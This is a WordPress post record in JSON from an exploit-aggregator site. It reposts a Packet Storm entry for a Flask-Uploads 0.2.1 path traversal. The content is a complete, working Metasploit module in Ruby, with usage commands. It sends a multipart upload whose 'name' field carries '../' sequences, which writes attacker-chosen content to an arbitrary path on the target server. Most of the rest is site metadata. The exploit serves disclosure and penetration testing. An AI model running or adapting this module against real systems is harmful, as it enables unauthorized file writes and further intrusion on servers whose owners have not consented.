{"id":38894,"date":"2026-02-03T14:37:13","date_gmt":"2026-02-03T14:37:13","guid":{"rendered":"http:\/\/localhost\/?p=38894"},"modified":"2026-02-03T14:37:13","modified_gmt":"2026-02-03T14:37:13","slug":"flask-uploads-021-path-traversal-arbitrary-file-write","status":"publish","type":"post","link":"https:\/\/zero.redgem.net\/?p=38894","title":{"rendered":"\ud83d\udcc4 Flask-Uploads 0.2.1 Path Traversal \/ Arbitrary File Write_PACKETSTORM:214818"},"content":{"rendered":"

{“lastseen”:”2026-02-03T20:21:00″,”description”:”Flask-Uploads versions 0.2.1 and below Metasploit module that exploits a path traversal vulnerability to achieve an arbitrary file write…”,”published”:”2026-02-03T00:00:00″,”modified”:”2026-02-03T00:00:00″,”type”:”packetstorm”,”title”:”\ud83d\udcc4 Flask-Uploads 0.2.1 Path Traversal \/ Arbitrary File Write”,”source”:””,”references”:””,”id”:”PACKETSTORM:214818″,”bulletinFamily”:”exploit”,”cwe”:null,”cvelist”:[],”sourceData”:”=============================================================================================================================================\\n | # Title : Flask-Uploads \\u003c= 0.2.1 Path Traversal to Arbitrary File Write |\\n | # Author : indoushka |\\n | # Tested on : windows 11 Fr(Pro) \/ browser : Mozilla firefox 147.0.1 (64 bits) |\\n | # Vendor : https:\/\/github.com\/maxcountryman\/flask-uploads |\\n =============================================================================================================================================\\n \\n [+] References : https:\/\/packetstorm.news\/files\/id\/214228\/ \\n \\n [+] Summary : This Metasploit module exploits a path traversal vulnerability in the Flask-Uploads library versions 0.2.1 and earlier.\\n The issue stems from insufficient sanitization of the name parameter used in the save() method of the UploadSet class, \\n \\t\\t\\t\\t allowing an attacker to traverse directories and write arbitrary files outside the intended upload directory.\\n The module is designed strictly to demonstrate arbitrary file write capability and does not assume or attempt remote code execution. \\n \\t\\t\\t\\t File execution depends entirely on application logic, server configuration, and file placement, which are intentionally left out of scope.\\n Successful exploitation may result in unauthorized file creation on the target filesystem, \\n \\t\\t\\t\\t potentially enabling further attacks when chained with additional vulnerabilities.\\n \\n [+] Usage : \\n \\n use exploit\/multi\/http\/flask_uploads_traversal\\n set RHOSTS \\u003cTARGET_IP\\u003e\\n set RPORT \\u003cTARGET_PORT\\u003e\\n set TARGETURI \/upload\\n exploit\\n \\n [+] POC :\\n \\n ##\\n # This module requires Metasploit: https:\/\/metasploit.com\/download\\n # Current source: https:\/\/github.com\/rapid7\/metasploit-framework\\n ##\\n \\n class MetasploitModule \\u003c Msf::Exploit::Remote\\n \\n Rank = AverageRanking\\n \\n include Msf::Exploit::Remote::HttpClient\\n \\n def initialize(info = {})\\n super(\\n update_info(\\n info,\\n ‘Name’ =\\u003e ‘Flask-Uploads \\u003c= 0.2.1 Path Traversal Arbitrary File Write’,\\n ‘Description’ =\\u003e %q{\\n This module exploits a path traversal vulnerability in the Flask-Uploads \\n library (version 0.2.1 and prior). The vulnerability allows for arbitrary \\n file writes outside of the intended upload directory by manipulating the \\n ‘name’ parameter passed to the save() function. This module focuses on \\n the file write primitive.\\n },\\n ‘Author’ =\\u003e [‘indoushka’],\\n ‘License’ =\\u003e MSF_LICENSE,\\n ‘References’ =\\u003e [\\n [‘URL’, ‘https:\/\/github.com\/maxcountryman\/flask-uploads\/issues\/43’]\\n ],\\n ‘Privileged’ =\\u003e false,\\n ‘Platform’ =\\u003e %w[linux win unix],\\n ‘Arch’ =\\u003e ARCH_ALL,\\n ‘Targets’ =\\u003e [[‘Generic Arbitrary File Write’, {}]],\\n ‘DisclosureDate’ =\\u003e ‘2024-10-25’,\\n ‘Notes’ =\\u003e {\\n ‘Stability’ =\\u003e [CRASH_SAFE],\\n ‘Reliability’ =\\u003e [], # No session guaranteed\\n ‘SideEffects’ =\\u003e [ARTIFACTS_ON_DISK]\\n }\\n )\\n )\\n \\n register_options([\\n OptString.new(‘TARGETURI’, [true, ‘The vulnerable endpoint URL’, ‘\/upload’]),\\n OptString.new(‘FIELD_NAME’, [true, ‘The multipart field name for the file upload’, ‘files’]),\\n OptString.new(‘TRAVERSAL_DEPTH’, [true, ‘Depth of path traversal to reach root’, ’10’]),\\n OptString.new(‘REMOTE_PATH’, [true, ‘The target path on the remote system’, ‘\/tmp\/pwned.txt’]),\\n OptString.new(‘FILE_CONTENT’, [true, ‘Content to write to the remote file’, ‘Vulnerability Confirmed’])\\n ])\\n end\\n \\n def check\\n \\n res = send_request_cgi({\\n ‘method’ =\\u003e ‘GET’,\\n ‘uri’ =\\u003e normalize_uri(target_uri.path)\\n })\\n return CheckCode::Unknown(‘No response from the target.’) unless res\\n \\n if res.code == 200\\n return CheckCode::Detected(\\”Endpoint #{target_uri.path} is reachable.\\”)\\n end\\n \\n CheckCode::Safe\\n end\\n \\n def exploit\\n \\n traversal = \\”..\/\\” * datastore[‘TRAVERSAL_DEPTH’].to_i\\n remote_filename = datastore[‘REMOTE_PATH’].sub(%r{^\/}, ”)\\n malicious_name = \\”#{traversal}#{remote_filename}\\”\\n \\n data = Rex::MIME::Message.new\\n \\n data.add_part(\\n datastore[‘FILE_CONTENT’], \\n ‘text\/plain’, \\n nil, \\n \\”form-data; name=\\\\\\”#{datastore[‘FIELD_NAME’]}\\\\\\”; filename=\\\\\\”test.txt\\\\\\”\\”\\n )\\n \\n data.add_part(malicious_name, nil, nil, \\”form-data; name=\\\\\\”name\\\\\\”\\”)\\n \\n print_status(\\”Attempting to write #{datastore[‘FILE_CONTENT’].length} bytes to #{datastore[‘REMOTE_PATH’]}…\\”)\\n \\n res = send_request_cgi({\\n ‘method’ =\\u003e ‘POST’,\\n ‘uri’ =\\u003e normalize_uri(target_uri.path),\\n ‘ctype’ =\\u003e \\”multipart\/form-data; boundary=#{data.bound}\\”,\\n ‘data’ =\\u003e data.to_s\\n })\\n \\n if res \\u0026\\u0026 res.code == 200\\n print_good(\\”Server responded with 200 OK. Verification required at: #{datastore[‘REMOTE_PATH’]}\\”)\\n else\\n status = res ? res.code : ‘no response’\\n fail_with(Failure::UnexpectedReply, \\”Server responded with #{status}. Exploitation failed.\\”)\\n end\\n end\\n end\\n \\n Greetings to :============================================================\\n jericho * Larry W. Cashdollar * r00t * Malvuln (John Page aka hyp3rlinx)*|\\n ==========================================================================”,”sourceHref”:”https:\/\/packetstorm.news\/download\/214818″,”cvss”:{“score”:0,”severity”:”NONE”,”vector”:”NONE”,”version”:”NONE”},”cvss2″:{},”cvss3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””,”cvssV3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””}},”href”:”https:\/\/packetstorm.news\/files\/id\/214818\/”,”category_name”:”Exploit”,”post_link”:””,”product”:””,”version”:””,”vendor”:””,”ai_description”:””,”ai_severity”:””,”ai_vendor”:””,”ai_product”:””,”ai_version”:””,”ai_score”:0}<\/p>\n","protected":false},"excerpt":{"rendered":"

{“lastseen”:”2026-02-03T20:21:00″,”description”:”Flask-Uploads versions 0.2.1 and below Metasploit module that exploits a path traversal vulnerability to achieve an arbitrary file write…”,”published”:”2026-02-03T00:00:00″,”modified”:”2026-02-03T00:00:00″,”type”:”packetstorm”,”title”:”\ud83d\udcc4 Flask-Uploads 0.2.1 Path Traversal \/ Arbitrary…<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[6,8,12,13,33,53,7,11,5],"class_list":["post-38894","post","type-post","status-publish","format-standard","hentry","category-category_exploit","tag-cve","tag-cvss","tag-exploit","tag-news","tag-none","tag-packetstorm","tag-security","tag-tapic","tag-vulnerability"],"yoast_head":"\n\ud83d\udcc4 Flask-Uploads 0.2.1 Path Traversal \/ Arbitrary File Write_PACKETSTORM:214818 - zero redgem<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/zero.redgem.net\/?p=38894\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"\ud83d\udcc4 Flask-Uploads 0.2.1 Path Traversal \/ Arbitrary File Write_PACKETSTORM:214818 - zero redgem\" \/>\n<meta property=\"og:description\" content=\"{“lastseen”:”2026-02-03T20:21:00″,”description”:”Flask-Uploads versions 0.2.1 and below Metasploit module that exploits a path traversal vulnerability to achieve an arbitrary file write…”,”published”:”2026-02-03T00:00:00″,”modified”:”2026-02-03T00:00:00″,”type”:”packetstorm”,”title”:”\ud83d\udcc4 Flask-Uploads 0.2.1 Path Traversal \/ Arbitrary...\" \/>\n<meta property=\"og:url\" content=\"https:\/\/zero.redgem.net\/?p=38894\" \/>\n<meta property=\"og:site_name\" content=\"zero redgem\" \/>\n<meta property=\"article:published_time\" content=\"2026-02-03T14:37:13+00:00\" \/>\n<meta name=\"author\" content=\"invoker\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"invoker\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"4 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=38894#article\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=38894\"},\"author\":{\"name\":\"invoker\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/person\\\/fbfeae8dfad117ac08a7621bee1a1dca\"},\"headline\":\"\ud83d\udcc4 Flask-Uploads 0.2.1 Path Traversal \\\/ Arbitrary File Write_PACKETSTORM:214818\",\"datePublished\":\"2026-02-03T14:37:13+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=38894\"},\"wordCount\":856,\"commentCount\":0,\"publisher\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\"},\"keywords\":[\"CVE\",\"CVSS\",\"exploit\",\"news\",\"NONE\",\"packetstorm\",\"Security\",\"tapic\",\"Vulnerability\"],\"articleSection\":[\"category_exploit\"],\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"CommentAction\",\"name\":\"Comment\",\"target\":[\"https:\\\/\\\/zero.redgem.net\\\/?p=38894#respond\"]}]},{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=38894\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/?p=38894\",\"name\":\"\ud83d\udcc4 Flask-Uploads 0.2.1 Path Traversal \\\/ Arbitrary File Write_PACKETSTORM:214818 - zero redgem\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#website\"},\"datePublished\":\"2026-02-03T14:37:13+00:00\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=38894#breadcrumb\"},\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/zero.redgem.net\\\/?p=38894\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=38894#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\\\/\\\/zero.redgem.net\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"\ud83d\udcc4 Flask-Uploads 0.2.1 Path Traversal \\\/ Arbitrary File Write_PACKETSTORM:214818\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#website\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/\",\"name\":\"zero redgem\",\"description\":\"\",\"publisher\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/zero.redgem.net\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"en-US\"},{\"@type\":\"Organization\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\",\"name\":\"zero redgem\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/logo\\\/image\\\/\",\"url\":\"\",\"contentUrl\":\"\",\"width\":191,\"height\":188,\"caption\":\"zero redgem\"},\"image\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/logo\\\/image\\\/\"}},{\"@type\":\"Person\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/person\\\/fbfeae8dfad117ac08a7621bee1a1dca\",\"name\":\"invoker\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"url\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"contentUrl\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"caption\":\"invoker\"},\"sameAs\":[\"https:\\\/\\\/zero.redgem.net\"],\"url\":\"https:\\\/\\\/zero.redgem.net\\\/?author=1\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"\ud83d\udcc4 Flask-Uploads 0.2.1 Path Traversal \/ Arbitrary File Write_PACKETSTORM:214818 - zero redgem","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/zero.redgem.net\/?p=38894","og_locale":"en_US","og_type":"article","og_title":"\ud83d\udcc4 Flask-Uploads 0.2.1 Path Traversal \/ Arbitrary File Write_PACKETSTORM:214818 - zero redgem","og_description":"{“lastseen”:”2026-02-03T20:21:00″,”description”:”Flask-Uploads versions 0.2.1 and below Metasploit module that exploits a path traversal vulnerability to achieve an arbitrary file write…”,”published”:”2026-02-03T00:00:00″,”modified”:”2026-02-03T00:00:00″,”type”:”packetstorm”,”title”:”\ud83d\udcc4 Flask-Uploads 0.2.1 Path Traversal \/ Arbitrary...","og_url":"https:\/\/zero.redgem.net\/?p=38894","og_site_name":"zero redgem","article_published_time":"2026-02-03T14:37:13+00:00","author":"invoker","twitter_card":"summary_large_image","twitter_misc":{"Written by":"invoker","Est. reading time":"4 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/zero.redgem.net\/?p=38894#article","isPartOf":{"@id":"https:\/\/zero.redgem.net\/?p=38894"},"author":{"name":"invoker","@id":"https:\/\/zero.redgem.net\/#\/schema\/person\/fbfeae8dfad117ac08a7621bee1a1dca"},"headline":"\ud83d\udcc4 Flask-Uploads 0.2.1 Path Traversal \/ Arbitrary File Write_PACKETSTORM:214818","datePublished":"2026-02-03T14:37:13+00:00","mainEntityOfPage":{"@id":"https:\/\/zero.redgem.net\/?p=38894"},"wordCount":856,"commentCount":0,"publisher":{"@id":"https:\/\/zero.redgem.net\/#organization"},"keywords":["CVE","CVSS","exploit","news","NONE","packetstorm","Security","tapic","Vulnerability"],"articleSection":["category_exploit"],"inLanguage":"en-US","potentialAction":[{"@type":"CommentAction","name":"Comment","target":["https:\/\/zero.redgem.net\/?p=38894#respond"]}]},{"@type":"WebPage","@id":"https:\/\/zero.redgem.net\/?p=38894","url":"https:\/\/zero.redgem.net\/?p=38894","name":"\ud83d\udcc4 Flask-Uploads 0.2.1 Path Traversal \/ Arbitrary File Write_PACKETSTORM:214818 - zero redgem","isPartOf":{"@id":"https:\/\/zero.redgem.net\/#website"},"datePublished":"2026-02-03T14:37:13+00:00","breadcrumb":{"@id":"https:\/\/zero.redgem.net\/?p=38894#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/zero.redgem.net\/?p=38894"]}]},{"@type":"BreadcrumbList","@id":"https:\/\/zero.redgem.net\/?p=38894#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/zero.redgem.net\/"},{"@type":"ListItem","position":2,"name":"\ud83d\udcc4 Flask-Uploads 0.2.1 Path Traversal \/ Arbitrary File Write_PACKETSTORM:214818"}]},{"@type":"WebSite","@id":"https:\/\/zero.redgem.net\/#website","url":"https:\/\/zero.redgem.net\/","name":"zero redgem","description":"","publisher":{"@id":"https:\/\/zero.redgem.net\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/zero.redgem.net\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"en-US"},{"@type":"Organization","@id":"https:\/\/zero.redgem.net\/#organization","name":"zero redgem","url":"https:\/\/zero.redgem.net\/","logo":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/zero.redgem.net\/#\/schema\/logo\/image\/","url":"","contentUrl":"","width":191,"height":188,"caption":"zero redgem"},"image":{"@id":"https:\/\/zero.redgem.net\/#\/schema\/logo\/image\/"}},{"@type":"Person","@id":"https:\/\/zero.redgem.net\/#\/schema\/person\/fbfeae8dfad117ac08a7621bee1a1dca","name":"invoker","image":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","url":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","caption":"invoker"},"sameAs":["https:\/\/zero.redgem.net"],"url":"https:\/\/zero.redgem.net\/?author=1"}]}},"_links":{"self":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts\/38894","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=38894"}],"version-history":[{"count":0,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts\/38894\/revisions"}],"wp:attachment":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=38894"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=38894"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=38894"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}